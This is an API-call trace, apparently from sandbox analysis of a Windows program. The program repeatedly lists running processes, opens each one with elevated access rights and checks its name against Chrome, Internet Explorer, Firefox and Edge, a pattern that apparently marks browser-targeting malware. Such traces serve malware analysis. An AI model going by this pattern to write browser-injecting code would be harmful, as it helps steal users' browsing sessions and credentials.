	[0252.052] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0xe0
	[0252.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.052] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.052] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.053] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.053] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.053] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0252.054] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x170
	[0252.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.054] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0252.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.054] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.055] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0252.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.055] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.055] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0252.056] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x174
	[0252.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.056] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.056] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.057] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.057] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.057] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0252.058] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0xa4a0
	[0252.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.058] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0252.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.058] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.058] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0252.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.059] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.059] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.060] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0xa4a4
	[0252.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.060] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.060] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.060] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.061] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.061] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0252.062] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd70) returned 0xa4a8
	[0252.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.062] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0252.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.062] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.062] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0252.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.063] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.063] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0252.064] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd6c) returned 0xa4ac
	[0252.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.064] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.064] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.064] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.065] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.065] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0252.066] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xed4) returned 0xa4b0
	[0252.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.066] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0252.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.067] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.067] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0252.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.067] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.067] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0252.068] CloseHandle (hObject=0x4fd0) returned 1
	[0252.068] Sleep (dwMilliseconds=0x64) 
	[0252.176] GetCurrentProcessId () returned 0x110
	[0252.176] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0252.180] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0252.181] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0252.182] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0252.183] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xa4b4
	[0252.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.183] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0252.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.183] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.184] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0252.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.184] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.184] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0252.185] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xa4b8
	[0252.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.185] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0252.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.186] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.186] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0252.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.187] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.187] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0252.188] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xa4bc
	[0252.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.188] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0252.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.188] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.189] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0252.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.189] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.189] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0252.190] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xa4c0
	[0252.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.191] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0252.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.191] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.191] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0252.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.192] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.192] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0252.193] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xa4c4
	[0252.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.193] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0252.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.193] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.194] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0252.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.194] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.194] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0252.195] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xa4c8
	[0252.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.195] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0252.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.196] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.196] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0252.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.196] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.197] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0252.197] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xa4cc
	[0252.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.197] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0252.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.198] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.198] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0252.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.198] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.199] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0252.199] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xa4d0
	[0252.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.199] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0252.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.200] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.200] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0252.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.200] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.200] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.201] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xa4d4
	[0252.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.201] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.202] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.202] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.202] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.202] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.203] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xa4d8
	[0252.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.203] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.204] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.204] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.204] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.205] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.205] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xa4dc
	[0252.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.205] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.206] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.206] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.207] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.207] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.207] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xa4e0
	[0252.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.208] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.208] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.208] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.209] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.209] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.210] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xa4e4
	[0252.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.210] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.210] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.210] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.211] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.211] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.212] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xa4e8
	[0252.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.212] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.212] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.213] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.213] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.213] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.214] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xa4ec
	[0252.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.214] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.214] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.215] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.215] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.215] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0252.216] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xa4f0
	[0252.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.216] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0252.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.216] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.217] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0252.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.217] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
